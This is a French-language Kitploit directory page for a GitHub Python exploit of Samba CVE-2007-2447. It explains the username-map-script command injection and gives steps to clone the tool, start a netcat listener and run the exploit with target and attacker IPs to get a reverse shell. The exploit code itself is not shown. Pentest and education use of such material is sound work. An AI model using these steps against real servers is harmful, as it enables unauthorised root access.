Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Samba CVE-2007-2447 Exploit | Kitploit
Outils/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access Tool
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Samba CVE-2007-2447 Exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 4 moisPas encore vérifié

Exploit Samba CVE-2007-2447 (Script de mappage de nom d'utilisateur)

Ce dépôt contient un script Python conçu pour automatiser l'exploitation de la vulnérabilité CVE-2007-2447 sur les serveurs Samba (versions 3.0.20 à 3.0.25rc3). Cet outil a été développé à des fins exclusivement éducatives et pour des tests de pénétration autorisés.

📝 Description technique et académique

La vulnérabilité « Username Map Script » survient en raison du manque d'assainissement de l'entrée des noms d'utilisateur lorsque l'option username map script est activée dans la configuration de Samba. En envoyant un nom d'utilisateur contenant des métacaractères de shell (comme des backticks ` ou des sous-shells $()), le serveur exécute ces commandes avec les privilèges du service (souvent root).

🚀 Prérequis

  • Système d'exploitation : Kali Linux / Parrot OS (ou tout Linux avec smbclient installé).
  • Langage : Python 3.x.
  • Dépendances : smbclient (doit être disponible dans le PATH du système).

🛠️ Installation et utilisation

  1. Cloner le dépôt :
    root@kitploit:~
    git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
    cd samba-exploit-cve-2007-2447
    
  2. Donner les permissions d'exécution
    root@kitploit:~
    chmod +x exploit.py
    
  3. Préparer l'écouteur (Kali Linux)
    root@kitploit:~
    nc -lvnp 4444
    
  4. Exécuter l'exploit
    root@kitploit:~
    ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
    
Télécharger l’outil